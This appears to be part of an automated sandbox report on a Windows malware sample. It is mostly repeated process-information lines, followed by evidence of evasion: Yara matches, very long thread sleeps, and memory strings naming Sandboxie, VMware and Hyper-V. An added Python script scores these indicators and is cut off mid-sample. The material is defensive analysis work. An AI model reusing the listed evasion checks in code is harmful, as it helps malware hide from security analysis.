              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (17 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (71 identical entries)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (17 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (75 identical entries)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (27 identical entries)
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (15 identical entries)

              Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
Source: Yara match | File source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
Source: powershell.exe, 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (7 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5339
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3707
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1797
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4855
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 6698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 3123
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8463
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1912 | Thread sleep time: -30000s >= -30000s (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 | Thread sleep count: 1797 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 | Thread sleep count: 289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 500 | Thread sleep count: 4855 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 500 | Thread sleep count: 3970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336 | Thread sleep count: 7329 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904 | Thread sleep count: 1371 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032 | Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484 | Thread sleep count: 8463 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828 | Thread sleep count: 347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (10 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File Volume queried: C:\ FullSizeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (7 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2260569508.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3363554166.000001B3F885D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3362988632.000001B3F322B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2244830635.0000016D403D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_Ct
Source: RegSvcs.exe, 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard
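The evasion evidence in this section falls into a handful of patterns that can be scored mechanically: waits whose magnitude is 922337203685477 (which equals floor(2^63 / 10^4), the signed 64-bit limit scaled to milliseconds) or a multiple of it, sleep loops above the report's own "> 30" threshold, memory strings that name an analysis product or hypervisor (SBIEDLL.DLL for Sandboxie, vmware, Hyper-V), the WSH-Timer window wscript creates for its timers, and hardware probes (a raw open of PhysicalDrive0, a FullSizeInformation query on C:\). The Python script below is an added example, not part of the Joe Sandbox report: it parses lines in the report's shape and classifies them. The technique names, weights and artifact-string table are my own assumptions; the sample lines are copied from entries above plus one constructed benign line with a short sleep and a sub-threshold loop count.

```python
"""Classify sandbox-evasion evidence in Joe Sandbox-style behaviour lines.

Added example, not part of the report. The technique labels, weights and
the artifact-string table are assumptions of mine; the two thresholds
(sleep count > 30, a single wait >= 30000 s) are the ones the report
prints beside its own findings.
"""
import re
from collections import defaultdict

# 922337203685477 == 2**63 // 10**4: the signed 64-bit limit scaled to
# milliseconds, i.e. an infinite or saturated wait rather than a real delay
# (assumption about how the report scales the value; its multiples are sums).
INT64_MS = 2**63 // 10_000

# Strings that name an analysis product or hypervisor (assumed table).
ARTIFACT_STRINGS = {
    "sbiedll.dll": "Sandboxie",
    "vmware": "VMware",
    "hyper-v": "Hyper-V",
    "vbox": "VirtualBox",
    "qemu": "QEMU",
}

SEP = r"\s*\|?\s*"  # the report's two columns, with or without a separating bar
SLEEP_TIME = re.compile(rf"^Source: (?P<src>.+?) TID: (?P<tid>\d+){SEP}Thread sleep time: -(?P<secs>\d+)s")
SLEEP_COUNT = re.compile(rf"^Source: (?P<src>.+?) TID: (?P<tid>\d+){SEP}Thread sleep count: (?P<count>\d+)")
MEM_STRING = re.compile(rf"^Source: (?P<src>[^,|]+).*?{SEP}Binary or memory string: (?P<text>.+)$")
WINDOW = re.compile(rf"^Source: (?P<src>.+?){SEP}Window found: window name: (?P<name>.+)$")
RAW_DISK = re.compile(rf"^Source: (?P<src>.+?){SEP}File opened: (?P<dev>PhysicalDrive\d+)$")
VOLUME = re.compile(rf"^Source: (?P<src>.+?){SEP}File Volume queried: (?P<vol>\S+) FullSizeInformation$")

# One weight per technique present; the number of hits does not inflate it.
WEIGHTS = {"infinite_wait": 3, "sleep_loop": 3, "analysis_artifact_string": 3,
           "long_sleep": 2, "raw_disk_probe": 2, "disk_size_probe": 1, "script_host_sleep": 1}

# Sample lines in the report's shape (copied from the report) plus a
# constructed benign line with a 5 s sleep and a loop count of 12.
SAMPLE = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1912 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2000 | Thread sleep time: -5s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 | Thread sleep count: 1797 > 30
Source: C:\Windows\System32\svchost.exe TID: 2000 | Thread sleep count: 12
Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
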